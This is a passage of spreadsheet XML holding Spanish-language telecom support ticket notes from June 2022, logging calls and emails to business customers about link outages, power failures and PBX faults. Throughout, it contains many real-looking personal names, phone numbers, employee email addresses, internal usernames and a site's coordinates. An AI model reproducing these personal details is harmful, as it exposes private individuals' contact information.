    <t>SE LLAMA A CLIENTE ALEXANDER MONTANO 70001417 NO RESPONDE, SE INETNTARA LUEGO
-ID 2001388523</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER MONTANO 70001417 - 72776660 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001307852 - 2001307926</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER MONTANO 70001417 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001231088</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 12:55
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; RUIZ GARCÍA KARINA &lt;KRUIZ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002473635OC::: TICKET CNOC IMBBL004177::: "ENLACE FUERA"
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER MONTANO 70001417 SIGUE SIN RESPONDER
-ID 2001368953</t>
  </si>
  <si>
    <t>F4595230</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE TANIA CERON AL 22109500 NO CONTESTA || SE INTENTARA LUEGO **
-ID 2001155695
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE TANIA CERON AL 22109500 CONTESTA EL SEÑOR SANTIAGO BONILLA QUIEN SOLICITA QUE SE LE ENVIE CORREO QUE YA ESTA UP EL SERVICIO Y QUE NOS ESTARA RESPONDIENDO || SE NOTIFICA A GESTOR **
-ID 2001169880
**</t>
  </si>
  <si>
    <t>F4595235</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SUYAPA VALDEZ 33401052 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001136260</t>
  </si>
  <si>
    <t>F4595243</t>
  </si>
  <si>
    <t>PASAR A PLEX CORTE DE FIBRA IDENTIFICAD POR TECNICO DE CAMPO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DAVID 78732836 VALIDA EQUIPOS ENCENDIDOS, APLICO REINICIO PERO ENLACE NO LEVANTA, SE SOLCITA APOYO DE CAMPO.</t>
  </si>
  <si>
    <t>F4595244</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER MULATO AL  77412447 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
-ID 2001204667
**</t>
  </si>
  <si>
    <t>SE LLAMA A ALEXANDER PARA INFORMARLE LO SIGUIENTE: SIN EMBARGO NO RESPONDE
&gt;&gt;&gt;&gt; SE VALIDA CAIDAS CONSTANTES EN EL PUERTO LAN
&gt;&gt;&gt;&gt; VALIDAR SI AUN PERSISTE INCONVENIENTE PARA QUE COMPARTA PRUEBAS VIA CORREO. Y TRAZAS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER MULATO AL  23130721 / 77412447 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001173065 - 2001173190
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER MULATO AL  23130721 / 77412447 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001157160 - 2001157233
**</t>
  </si>
  <si>
    <t>F4595251</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE KAREN, INDICA QUE CONECTO LA INTERFAZ AL ROUTER DE CLARO Y SERVICIO HA RESTABLECIDO, POR LO QUE AUTORIZA CIERRE DE TICKET.
2001142941
COLA:
NOMBRE: A: 42127640
NÚMERO: 42127640
DURACIÓN: 0:01:13
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 42127640
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 9/06/2022 08:50:08</t>
  </si>
  <si>
    <t>F4595255</t>
  </si>
  <si>
    <t>SE LLAMO A MONITOREO 5B CONSTESTO MOISES COMENTO QUE TIENE ALARMA POR ENERGIA EN EL UPS POR LO QUE ES PROBABLE QUE SEA TEMA DE ENERGIA , COMENTA QUE SE LLAME EL DIA DE MAÑANA SI NO HA RETORNADO SEÑAL DEL ENLACE.
2001296097
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:04:07
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 9/06/2022 16:41:28</t>
  </si>
  <si>
    <t>F4595262</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  HEBERTO RUIZ   8920 0091 INDICA QUE NO ESTA EN LA DELEGACION SOLICITA QUE SE LE LLAME NUEVAMENTE QUE CONFIRMARA **
-ID 2001158626
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO ROCHA  8381 5378 NO RESPONDE,  ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001158197
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  HEBERTO RUIZ   8920 0091  NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO**
ID 2001161682
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO ROCHA  8381 5378 INDICA QUE AUN SIGUE EL INCONVENIENTE QUE NO TIENE SERVICIO || SE NOTIFICA A GESTOR  **
-ID 2001177464
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  HEBERTO RUIZ   8920 0091  NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO**
ID 2001177104
**</t>
  </si>
  <si>
    <t>F4595272</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VALERIA PADILLA 22040711  MENCIONA QUE ESTARAN GESTINANDO LOS PERMISOS Y RESPONDERAN CUANDO YA TENGAN AUTORIZADOS LOS PERMISOS
-ID 2001184643 - 2001184847</t>
  </si>
  <si>
    <t>F4595273</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE ESMERALDA VEGA 78551760 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001352026</t>
  </si>
  <si>
    <t>F4595280</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE TATIANA DAVILA 7649-4546 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001244012
**</t>
  </si>
  <si>
    <t>F4595281</t>
  </si>
  <si>
    <t>F4595290</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE LOS MERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 10:31
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; GEYSEL.RODRIGUEZ@RED-TECNOLOGICA.COM &lt;GEYSEL.RODRIGUEZ@RED-TECNOLOGICA.COM&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; SERGIO AYALA FIGUEROA &lt;SERGIO.AYALA@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;
CC: 'HEBER ERAZO' &lt;HEBER.ERAZO@RED-TECNOLOGICA.COM&gt;; 'MARIO VASQUEZ' &lt;MARIO.VASQUEZ@RED-TECNOLOGICA.COM&gt;; 'FELIX.RAMOS' &lt;FELIX.RAMOS@RED-TECNOLOGICA.COM&gt;; FABRICIO.CANALES@RED-TECNOLOGICA.COM &lt;FABRICIO.CANALES@RED-TECNOLOGICA.COM&gt;
ASUNTO: RE: CAÍDA DE ENLACE DE DATOS COOPERATIVA COACFIL FILIAL SAN ANTONIO
*-*-*-*</t>
  </si>
  <si>
    <t>F4595291</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIANA RAMIREZ 82115802 NO RESPONDE, SE INTENTARA LUEGO
--ID 2001307248</t>
  </si>
  <si>
    <t>F4595296</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE JOSE PEREZ-47391182  ENVIA A BUZON 2 VECES ##SE INTENTARA NUEVEMENTE EN BREVE ##
2001171608
COLA:
NOMBRE: A: 47391182
NÚMERO: 47391182
DURACIÓN: 0:00:16
ESTADO: MARCANDO
DETALLES: 47391182
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 10:09:34
2001171808
COLA:
NOMBRE: A: 47391182
NÚMERO: 47391182
DURACIÓN: 0:00:08
ESTADO: MARCANDO
DETALLES: 47391182
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 10:09:59</t>
  </si>
  <si>
    <t>SE PROCEDE A LLAMAR A CLIENTE- JOSE PEREZ-47391182 ### SE ESTABA CON CLIENTE DE  FALLA  F4595191</t>
  </si>
  <si>
    <t>CLIENTE JOSE PEREZ-47391182  ## SE TIENE  EN LINEA ##
2001177360
COLA:
NOMBRE: A: 47391182
NÚMERO: 47391182
DURACIÓN: 0:00:26
ESTADO: CONECTADA
DETALLES: 47391182
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 10:25:42</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE PEREZ-47391182 NO CONTESTA ###ENVIA A BUZON
RESULTADO: LLAMADA HECHA
NOMBRE: 47391182
NÚMERO: 47391182
INICIO: HOY, 12:10
FIN: HOY, 12:10
DURACIÓN: 0:15
ID DE LLAMADA: 2001215736</t>
  </si>
  <si>
    <t>F4595301</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE GLENDA ALFAR-78748536  ##VALIDA ## VIVO ##</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GLENDA ALFARO AL  78748536 || SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID 2001183903
**</t>
  </si>
  <si>
    <t>F4595306</t>
  </si>
  <si>
    <t>SE LOGRA HABLAR CON CLIENTE VICTOR RIVERA QUIEN COMENTA QUE EL SERVICIO DEL E1 SE ENCUENTRA FUNCIONANDO BIEN, INDICA QUE UNICAMENTE TIENEN INCONVENIENTE CON UNA EXTENSIÓN, SE LE INDICA AL CLIENTE QUE ESE PROBLEMA DEBEN REPORTARLO CON EL PROVEEDOR DE SU PBX PARA QUE ELLOS VERIFIQUEN YA QUE A NIVEL DE CLARO EL E1 SE ENCUENTRA ACTIVO. CLIENTE ENTERADO AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050324206400
NÚMERO: 0050324206400
INICIO: HOY, 09:43 A. M.
FIN: HOY, 09:47 A. M.
DURACIÓN: 3:58
ID DE LLAMADA: 2001162213</t>
  </si>
  <si>
    <t>F4595320</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO LEMUS 30606775 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001261428</t>
  </si>
  <si>
    <t>F4595324</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE WILFREDO MARTINEZ 70890218, INDICA QUE NO RECIBEN LLAMADAS EXTERNAS, SE LE SOLICITA SU APOYO PARA UBICAR SU PLANTA Y REINICIAR. SE ENCUENTRA UBICANDO SU PBX. ID:2001183113</t>
  </si>
  <si>
    <t>CLIENTE REINICIA SU PLANTA PBX PERO INCONVENIENTE PERSISTE, LLAMADAS AL GDN NO INGRESAN, SE VALIDA EN SPG QUE CLIENTE NO TIENE BLOQUEO
RESULT  MAXIMIZE
RETURN CODE :  0
RETURN RESULT :  OPERATION SUCCEEDED.
RESULT DATA :  IMPU TEL:+50325945700
USER STATUS NORMAL</t>
  </si>
  <si>
    <t>F4595340</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLORIA GUZMÁN -4823839 ## VALIDA SERVICIO ##
2001198899
COLA:
NOMBRE: A: 48238390
NÚMERO: 011 50248238390
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: +50248238390
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 11:22:54</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLORIA GUZMÁN -48238390  |||
2001173029
COLA:
NOMBRE: A: 48238390
NÚMERO: 011 50248238390
DURACIÓN: 0:00:25
ESTADO: CONECTADA
DETALLES: +50248238390
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 10:13:35</t>
  </si>
  <si>
    <t>F4595348</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DEL PR BRENDA GONZALES 78728526/59671420 ID: 2001184792 INDICA QUE ESTA EN EL LUGAR Y PUEDE APOYAR CON PRUEBAS YA QUE AÚN EL SERVICIO ESTA CAÍDO, SE LLAMA A GESTOR RAMOS.MARLON ID: 2001185038 NO RESPONDE, SE CONTACTA A CNOC ID: 2001185199 Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/</t>
  </si>
  <si>
    <t>F4595350</t>
  </si>
  <si>
    <t>*/*/*/SE CONSULTA A RODOLFO ESTRADA 58261606 ID: 2001182385 E INDICA QUE GESTOR DARWINH.ESPANA PUEDE COMUNICARSE CON DOMINGO GOMEZ PARA INFOMRMACIÓN DE LA MIGRACIÓN QUE SE LE ESTA REALIZANDO AL CLIENTE, ADICIONALMENTE INFORMA QUE YA PERSONAL TÉCNICO VA EN CAMINO AL LUGAR, POR LO QUE SE LE NOTIFICA POR SKYPE A GESTOR, PARA QUE PROCEDA CON EL SEGUIMIENTO Y SE CAMBIA DE ESTADO*/*/*/</t>
  </si>
  <si>
    <t>SE CONVERSA CON RODOLFO ESTRADA, SOLICITA SE LE TENGA EN MONIOTOREO  PARA EL DIA DE MAÑANA 13/06 HASTA LAS 8:00 HORAS.
2001720726
COLA:
NOMBRE: A: 58261606
NÚMERO: 58261606
DURACIÓN: 0:01:17
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58261606
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 12/06/2022 11:20:44</t>
  </si>
  <si>
    <t>SE  CONVERSA CON RODOLFO ESTRADA,  INDICA QUE SE MANTENGA EN MONITOREO HASTA LAS 10:00 HORAS DE HOY.
2001794238
COLA:
NOMBRE: A: 58261606
NÚMERO: 58261606
DURACIÓN: 0:01:28
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 58261606
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/06/2022 08:28:58</t>
  </si>
  <si>
    <t>F4595351</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001203865
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PDV AL 77628310 SIGUE SIN RESPONDER || SE INTENTARA LUEGO ||
ID 2001291008
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE A PDV AL 77628310   NO RESPONDE || A ESPERA QUE BRINDEN OTRO CONTACTO O
 SE INTENTARA LUEGO **
-ID 2001189178
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 77628310 SIGUE SIN RESPONDER || SE INTENTARA LUEGO ||
ID 2001222477
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PDV AL 77628310 SIGUE SIN RESPONDER || SE INTENTARA LUEGO ||
ID 2001253977
**</t>
  </si>
  <si>
    <t>F4595355</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YORDI MAYEN AL 47930848  SE BRINDA RETROALIMENTACION A CLIENTE  **
-ID 2001217523
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YORDI MAYEN AL 47930848  CONFIRMA QUE SI PUEDE LLEGAR EL TECNICO A LAS 12:00  QUE NO HAY PROBLEMA **
-ID 1001989977
**</t>
  </si>
  <si>
    <t>F4595358</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE---
SD1133551 - BANCO AGRICOLA S.A</t>
  </si>
  <si>
    <t>CLIENTE RESPONDE VIA CORREO QUE VALIDARA A NIVEL LAN---</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 14:44
PARA: ROBER ALCIDES DUENAS ALCANTARA &lt;RDUENAS@BANCOAGRICOLA.COM.SV&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; FRANCISCO REYES MIRANDA ESCOBAR &lt;FMIRANDA@BANCOAGRICOLA.COM.SV&gt;
ASUNTO: RE: SD1133551 - BANCO AGRICOLA S.A
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4595364</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE RODOLFO JAVIER URIZAR REYES, INDICA QUE NO HAY ENERGIA EN SITIO Y QUE YA REPORTO PERO NO LE PRESTARON ATENCION DESDE LUEGO SE LE ESTA LLAMANDO POR LO MISMO. AUTORIZA CIERRE DE CASO E INDICA QUE SI NO VUELVE EL SERVICIO LUEGO DE QUE RETORNE LA ENERGIA, ENTONCES REALIZARA REPORTE DEL SERVICIO.
NÚMERO: 46240171
FIN: HOY, 09:53
ID DE LLAMADA: 2001165048</t>
  </si>
  <si>
    <t>F4595366</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LUIS MONGE AL 77473518 CLIENTE INDICA QUE YA LE LLAMARON Y AL HABLO CON GESTOR QUE HIBAN A APLICAR UN REINCIO || SE NOTIFICA A GESTOR**
-ID 2001200166
**</t>
  </si>
  <si>
    <t>F4595371</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AMY ALEXANDRA  49328491 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LAMADA EN 10 MIN
-ID 2001176582</t>
  </si>
  <si>
    <t>F4595377</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2411-9191 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001173750</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY ESTUARDO 30192528 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 2001177384</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY ESTUARDO 30192528 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMDAA EN 10 MIN
-ID 2001170772</t>
  </si>
  <si>
    <t>F4595379</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY DAVID 54672093 MENCIONA QUE PRESENTARON PROBLEMAS DE ENERGIA PERO YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001201586</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY DAVID 54672093 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001183863</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  HENRY DAVID 54672093 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001197338</t>
  </si>
  <si>
    <t>F4595385</t>
  </si>
  <si>
    <t>SE MANDO CORREO AL CLIENTE SOLICITANDO LOS ACCESOS ESTAMOS A LA ESPERA DE LA CONFIRMACIÓN
DE: JOSE ARTURO CORADO JIMENEZ
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 10:26
PARA: NOCSE@MP.GOB.GT &lt;NOCSE@MP.GOB.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || MINISTERIO PUBLICO || 758500317T || CONGUACO, JUTIAPA, ENTRADA PRINCIPAL, JUTIAPA, CONGUACO, 14°02'54.6"N 90°02'08.5"W, 14.048496, -90.
ESTIMADO CLIENTE POR ESTE MEDIO SOLCITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS PARA PERSONAL TÉCNICO CON RESPECTO AL SERVICIO REPORTADO CON EL ID: 758500317T , UBICADO EN CONGUACO, JUTIAPA, ENTRADA PRINCIPAL,  JUTIAPA, CONGUACO, 14°02'54.6"N 90°02'08.5"W, 14.048496, -90., ADJUNTO DATOS DEL PERSONAL TÉCNICO.
DATOS DEL TÉCNICO
 FREDY MARTINEZ IBM 658167
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KENNETH FERNANDO 42271739 PARA VALIDAR SI RECIBIO EL CORREO PERO DEJA EN ESPERA Y NO RETOMA LA LLAMADA
-ID 2001186002</t>
  </si>
  <si>
    <t>F4595391</t>
  </si>
  <si>
    <t>CLIENTE EVELYN FLORES 33287157  VALIDA QUE EL SERVICIO SE ENCUENTRA OPERATIVO, INDICA QUE VALIDARÁ CON SU DEPARTAMENTO DE IT Y ESTARÁ RESPONDIENDO VIA CORREO.
2001198740
COLA:
NOMBRE: A: 0050433287157
NÚMERO: 0050433287157
DURACIÓN: 0:02:05
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050433287157
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 09/06/2022 11:24:48 A. M.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EVELYN GABRIELA 33287157 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001443940</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN GABRIELA 33287157 MENCIONA QUE ESTARAN REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA LAS 12 HRS VALIDAR EL FUNCIONAMIENTO
-ID 2001378480</t>
  </si>
  <si>
    <t>F4595392</t>
  </si>
  <si>
    <t>CLIENTE CONFIRMA PROBLEMAS DE ENERGÍA (SE ADJUNTA IMAGEN)</t>
  </si>
  <si>
    <t>SE SOLICITARA INFORMACION A CLIENTE VIA SKYPE</t>
  </si>
  <si>
    <t>F4595398</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO JONATHAN 42181770 MENCIONA QUE VALIDARA CON PR, SOLICITA LLAMADA EN 10 MIN
-ID 2001183149</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ROBERTO JONATHAN 42181770 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 2001189567</t>
  </si>
  <si>
    <t>F4595401</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE A LA CENTRAL 24119191 CONTESTA UNA SEÑORITA Y TRANSFIERE LLAMADA PERO NO RESPONDEN**
-ID 2001239678
**</t>
  </si>
  <si>
    <t>**SE LLAMA A LA CENTRAL  24119191 NO RESPONDE, SE INTENTARA LUEGO **
-ID 2001289098
**</t>
  </si>
  <si>
    <t>F4595402</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ATIENDE SORAIDA COMENTA QUE YA CUENTA CON SERVICIO Y BRINDA CIERRE DE FALLA
2001252606
COLA:
NOMBRE: A: 50319135
NÚMERO: 011 50250319135
DURACIÓN: 0:00:56
ESTADO: CONECTADA
DETALLES: +50250319135
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 9/06/2022 14:13:09</t>
  </si>
  <si>
    <t>F4595403</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSÉ DARIO PÉREZ 53344315 MENCIONA QUE NO TIENE NINGUN CONTACTO DE PR POR LO QUE SOLICITA SE LLAME A LA CENTRAL
-ID 2001173072</t>
  </si>
  <si>
    <t>F4595404</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRENDA GONZALEZ 78518905 SE DEJA EN CONFRENCIA CON GESTOR
-ID 2001192090</t>
  </si>
  <si>
    <t>F4595406</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE EDWIN, INDICA QUE NO HAY ENERGIA ELECTRICA EN SITIO, AÑADE QUE TODO EL DIA NO HABRA  EN EL LUGAR, POR LO QUE AUTORIZA CIERRE DE CASO.
2001191140
COLA:
NOMBRE: A: 42149751
NÚMERO: 42149751
DURACIÓN: 0:00:45
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42149751
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 9/06/2022 11:01:41</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE EDWIN MANUEL SAC SIMAJ, INDICA QUE ESTARA VALIDANDO ENERGIA EN SITIO Y QUE SE LE LLAME NUEVAMENTE DETRO DE 10 MINUTOS APROXIMADAMENTE
2001181026
COLA:
NOMBRE: A: 42149751
NÚMERO: 42149751
DURACIÓN: 0:01:14
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 42149751
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 9/06/2022 10:36:09</t>
  </si>
  <si>
    <t>F4595412</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DANIEL ALBERTO GARCÍA 45836146 MENCIONA QUE NO CONTABAN CON ENERGIA EN PR
-ID 2001205155</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL ALBERTO GARCÍA AL 45836146 INDICA QUE NO SE HA PODIDO COMUNICAR A LA FISCALIA PARA CONFIRMAR TEMA DE ENERGIA SOLICITO QUE SE LE LLAME NUEVAMENTE EN 45 MIN**
-ID 2001185770
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL ALBERTO GARCÍA AL 45836146 INDICA QUE NO SE HA PODIDO COMUNICAR A LA FISCALIA PARA CONFIRMAR TEMA DE ENERGIA SOLICITO QUE SE LE LLAME NUEVAMENTE EN 5 MIN**
-ID 2001181934
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL ALBERTO GARCÍA AL 45836146 SOLICITA QUE SE LE LLAME EN 5 MIN VA A CONSULTAR SI HAY ENERGIA EN SITIO **
-ID 2001179342
**</t>
  </si>
  <si>
    <t>F4595414</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL ALBERTO 45836146 ENVIA DIRECTO A BUZON
-ID 2001196559</t>
  </si>
  <si>
    <t>F4595425</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JORGE HERNÁNDEZ/CLIENTE; SE LE INDICA ENLACE AFECTADO POR CORTE DE FO EN SECTOR, AVANCES EN DOS HORAS.</t>
  </si>
  <si>
    <t>F4595431</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDREA VASQUEZ 55553646 MENCIONA QUE SU IT ESTA DANDO SEGUIMIENTO CON ANGEL DODINEZ POR LO QUE NO BRINDA MAYOR INFORMACION
-ID 2001286632 - 2001287420</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE BYRON DÍAS 42827211 PERO NO CONTESTA Y ENVIA A BUZON
2001822363
2001822305
2001822232</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ANDREA VASQUEZ 55553646  PERO NO CONTESTA Y ENVIA A BUZON
2001822460
2001822606
2001822744</t>
  </si>
  <si>
